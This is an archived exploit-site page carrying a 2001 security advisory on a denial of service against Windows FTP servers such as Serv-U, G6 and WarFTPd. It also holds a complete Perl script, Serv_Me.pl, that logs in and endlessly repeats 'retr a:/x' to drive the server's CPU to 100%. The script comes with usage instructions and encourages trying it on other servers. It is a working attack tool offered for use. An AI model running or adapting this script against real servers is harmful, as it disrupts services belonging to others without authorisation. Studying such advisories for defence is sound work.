exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Hexyn-sa-19.txt

Hexyn-sa-19.txt
Posted Apr 25, 2001
Authored by T-Omicron | Site t-omicr0n.hexyn.be

Securax / Hexyn Security Advisory #19 - FTP Server Denial Of Service tested on Serv-U FTP Server, G6 FTP Server and WarFTPd Server. The servers will freeze for about one second, and the CPU usage will go through the roof. Includes perl exploit.

tags | exploit, denial of service, perl
SHA-256 | 2d2c1f7da07480b818ba73c4939a20bb83cb1d28705c9d63c332c2c8acb5f5fe

Hexyn-sa-19.txt

Change Mirror Download
Hexyn / Securax Advisory #19 - Multiple FTP Server DoS

Topic: Multiple FTP Server DoS
Announced: 2001-02-17
Affects: Serv-U FTP Server, G6 FTP Server, WarFTPd Server,...

DISCLAIMER:
***********
THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS.
THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS 100% CORRECT.
THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR NOTICE.

THIS ADVISORY HAS ONLY BEEN TESTED ON WINDOWS 98 AND ONLY ON A SMALL
COLLECTION OF TEST SERVERS, SO THE OFFERED INFORMATION MAY NOT ALWAYS
BE CORRECT.

I. Problem Description
**********************
There is a DoS attack in most of the FTP Servers available on for
Windows 9x/NT. The bug is a consequence of the way Windows handles disk
drives.

II. Impact
**************
When sending the command "retr a:/blah" (or "get a:/blah" in the
default UNIX FTP client), the server will freeze for about one second,
and the CPU usage will go through the roof.

Exploit:
--------
Available at: http://t-Omicr0n.hexyn.be/exploits.htm

III. Solution
*************
At this time, no patch is available yet.

IV. Credits
***********
Bug discovered by t-Omicr0n <omicr0n@themail.com>

Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel,
oPr, Reggie, F_F, Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3,
Preat0r, T0SH, zeroX, AreS, tips, Lacrima, GigaByte and everyone
at #securax@irc.hexyn.be

-- t-Omicr0n @ http://t-Omicr0n.hexyn.be



#!/usr/bin/perl

#
# Serv_Me.pl - Remote FTP DoS'er
# ------------------------------
# "And in the end I will be free, by kissing you, or killing me."
# -- Mister Me.

# Tested on Serv-U FTP, G6 FTP and WarFTPd. Lots of other servers are vulnerable, just try.
# It DoSSeS by flooding the server with "retr a:/bla" commands.
# CPU usage during tests (in %): 2 2 3 13 100 100 100 100 ...

# Read "Hexyn / Securax Advisory #19 - Multiple FTP Server DoS" for more information
# @ http://t-Omicr0n.hexyn.be/advisories.htm

# I *hate* those flooding DoS'es, it's normal a server slows down when you flood the hell
# out of it, but this flood only sends 0.009 Kb/s and that's not even considered a flood,
# that's considered a drop of bytes every second.
# You can even DoS the server over a 1 KiloBit/s modem... :-)

# Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel, oPr, Reggie, F_F,
# Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3, Preat0r, T0SH, zeroX, AreS, tips,
# Lacrima, GigaByte and everyone at #securax@irc.hexyn.be

# WARNING: This *may* damage the server's floppy disk drive.

use IO::Socket;

sub initiate {
if ($ARGV[0] eq '') {die "Usage: perl serv_me.pl <host> <port> <username> <password>\nExample: perl serv_me.pl 127.0.0.1 21 anonymous me@\n";}

$host = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
};

sub connecttoserver {
print("Connecting to host: $host\n");
$socket = IO::Socket::INET->new ( PeerAddr => $host,
PeerPort => $port,
Proto => "tcp",
Type => SOCK_STREAM
) || die "Can't connect to $host";

print "Socket Connected. Loggin in...\n";
};

sub login {
print "user $user\n";
print $socket "user $user\r\n";
$response = <$socket>;
print "$response\n";

print "pass $pass\n";
print $socket "pass $pass\r\n";
$response = <$socket>;
print "$response\n";

print "Logged in. Dossing now. Press CTRL-C to stop.\n";
};



sub doit {
for (;;){
print "retr a:/x\n";
print $socket "retr a:/x\r\n";
$response = <$socket>;
print "$response";
}
}

initiate();
connecttoserver();
login();
doit();

# -- t-Omicr0n @ http://t-Omicr0n.hexyn.be
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close